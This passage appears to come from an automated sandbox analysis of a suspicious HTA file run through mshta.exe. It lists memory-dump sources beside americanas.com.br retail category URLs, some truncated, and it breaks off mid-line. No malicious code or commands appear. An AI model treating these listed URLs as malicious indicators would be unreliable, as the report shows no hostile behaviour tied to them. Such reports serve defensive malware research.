Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2713852346.000000000960B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664288455.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727644987.00000000093AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2717336889.000000000960C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669695737.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/ar-condicionado-e-aquecedores?chave=pfm_hm_tt_1_0_ar-condici
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764473625.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726884364.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669963998.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/ar-condicionado-e-aquecedores?chave=pfm_home_ar_menu
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2714640345.0000000009A55000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769621202.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727460305.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747509040.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665727744.000000000C113000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705493492.0000000009A54000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670798916.0000000006EEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/artesanato?chave=pfm_home_artesanato_menu
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764473625.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726884364.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669963998.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/artigos-de-festas?chave=pfm_home_festas_menu
Source: mshta.exe, 00000000.00000003.2714640345.0000000009A55000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705493492.0000000009A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/artigos-de-festas?chave=pfm_home_festas_menuhttps://www.amer
Source: mshta.exe, 00000000.00000003.2676562635.000000000AA1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654506502.000000000AA0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654840614.000000000AA12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/artigosLh
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769831858.0000000006F1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774829877.000000000A9E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748531062.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/audio?chave=pfm_home_audio_menu
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668679539.00000000093CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669377685.00000000093D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664288455.00000000093CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666216386.000000000C0BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/automotivo?chave=dk_hm_at_automotivo
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665727744.000000000C113000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705339343.0000000009A87000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/automotivo?chave=pfm_home_automotivo_menu
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769831858.0000000006F1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774829877.000000000A9E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748531062.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/bebes?chave=pfm_home_bebes_menu
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/beleza-e-perfumaria/cabelos?chave=dk_hm_at_cabelos
Source: mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/beleza-e-perfumaria/cabelos?chave=dk_hm_at_cabelosmeta.large
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676815165.000000000AA24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744826440.000000000AA29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747376741.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775010969.000000000AA2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2746776298.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748881120.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676562635.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777141296.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/beleza-e-perfumaria?chave=pfm_home_beleza_menu
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727062236.000000000A851000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2716901409.0000000009A5C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2700261943.0000000009A5A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/bem-estar-sexual?chave=pfm_home_bemestarsexual_menu
Source: mshta.exe, 00000000.00000003.2651095257.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2772341116.000000000940C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670251868.000000000940C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534072196.0000000006591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2627081042.000000000975A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668835006.0000000009409000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2725760974.0000000009762000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/brinquedos/bonecas/reborn
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667632978.000000000C0CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776261386.000000000C0CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534072196.0000000006591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2627081042.000000000975A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2725760974.0000000009762000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666216386.000000000C0BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2627122723.000000000975B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/brinquedos/lego
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2749855570.000000000A9F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744785707.000000000A9F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/brinquedos/legow
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665727744.000000000C113000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 